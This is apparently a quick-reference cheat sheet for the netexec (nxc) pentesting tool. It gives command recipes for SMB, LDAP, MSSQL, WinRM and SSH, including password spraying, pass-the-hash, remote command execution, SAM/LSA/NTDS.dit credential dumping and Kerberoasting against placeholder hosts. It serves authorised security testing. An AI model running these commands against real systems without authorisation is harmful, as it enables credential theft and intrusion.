netexec
Network execution tool for pentesting (CrackMapExec successor).
Quickstart
nxc smb 10.10.10.10 -u user -p password
nxc smb 10.10.10.10 -u user -p password --shares
nxc winrm 10.10.10.10 -u user -p password -x "whoami"
nxc smb 10.10.10.0/24 -u users.txt -p password
Core Concepts
| Concept |
Description |
| Protocols |
smb, winrm, ldap, mssql, ssh, rdp, wmi |
| Credential testing |
Spray, pass-the-hash |
| Execution |
Remote command execution |
| Enumeration |
Users, shares, policies |
Syntax
nxc <protocol> <target> [options]
Options
Target
| Option |
Description |
<target> |
IP, CIDR, hostname, file |
Authentication
| Option |
Description |
-u <user> |
Username (or file) |
-p <pass> |
Password (or file) |
-H <hash> |
NTLM hash |
-d <domain> |
Domain |
--local-auth |
Local authentication |
-k |
Kerberos auth |
Execution
| Option |
Description |
-x <cmd> |
Execute command |
-X <ps> |
PowerShell command |
--exec-method <m> |
Execution method |
SMB Options
| Option |
Description |
--shares |
List shares |
--users |
List users |
--groups |
List groups |
--loggedon-users |
Logged on users |
--sessions |
Active sessions |
--pass-pol |
Password policy |
--rid-brute |
RID brute force |
--sam |
Dump SAM |
--lsa |
Dump LSA |
--ntds |
Dump NTDS.dit |
Output
| Option |
Description |
-o <file> |
Output file |
--export <fmt> |
Export format |
Recipes
SMB Enumeration
nxc smb 10.10.10.10 -u user -p password
nxc smb 10.10.10.10 -u user -p password --shares
nxc smb 10.10.10.10 -u user -p password --users
nxc smb 10.10.10.10 -u user -p password --pass-pol
nxc smb 10.10.10.10 -u user -p password --rid-brute
nxc smb 10.10.10.10 -u user -p password --loggedon-users
Credential Attacks
nxc smb 10.10.10.10 -u users.txt -p 'Password123'
nxc smb 10.10.10.10 -u users.txt -p passwords.txt
nxc smb 10.10.10.10 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:hash'
nxc smb 10.10.10.10 -u admin -p password --local-auth
Command Execution
nxc smb 10.10.10.10 -u admin -p password -x "whoami"
nxc smb 10.10.10.10 -u admin -p password -X "Get-Process"
nxc winrm 10.10.10.10 -u admin -p password -x "whoami"
Credential Dumping
nxc smb 10.10.10.10 -u admin -p password --sam
nxc smb 10.10.10.10 -u admin -p password --lsa
nxc smb dc.target.com -u admin -p password --ntds
nxc smb 10.10.10.10 -u admin -p password --ntds vss
Network Scanning
nxc smb 10.10.10.0/24
nxc smb 10.10.10.0/24 -u user -p password
nxc smb hosts.txt -u user -p password
LDAP
nxc ldap dc.target.com -u user -p password
nxc ldap dc.target.com -u user -p password --users
nxc ldap dc.target.com -u user -p password --groups
nxc ldap dc.target.com -u user -p password --kerberoasting output.txt
nxc ldap dc.target.com -u user -p password --asreproast output.txt
MSSQL
nxc mssql 10.10.10.10 -u sa -p password
nxc mssql 10.10.10.10 -u sa -p password -q "SELECT @@version"
nxc mssql 10.10.10.10 -u sa -p password -x "whoami"
WinRM
nxc winrm 10.10.10.10 -u user -p password
nxc winrm 10.10.10.10 -u user -p password -x "whoami"
nxc winrm 10.10.10.10 -u user -p password -X "Get-Process"
SSH
nxc ssh 10.10.10.10 -u user -p password
nxc ssh 10.10.10.10 -u user -p password -x "id"
Output & Parsing
nxc smb 10.10.10.0/24 -u user -p password -o results.txt
nxc smb 10.10.10.0/24 -u user -p password --export json results.json
nxc smb 10.10.10.0/24 -u user -p password 2>&1 | grep "+"
Troubleshooting
| Issue |
Solution |
| Connection refused |
Check port, service |
| Access denied |
Verify creds, try --local-auth |
| Kerberos errors |
Check time sync, use -k |
| SMB signing |
--smb-signing off |
References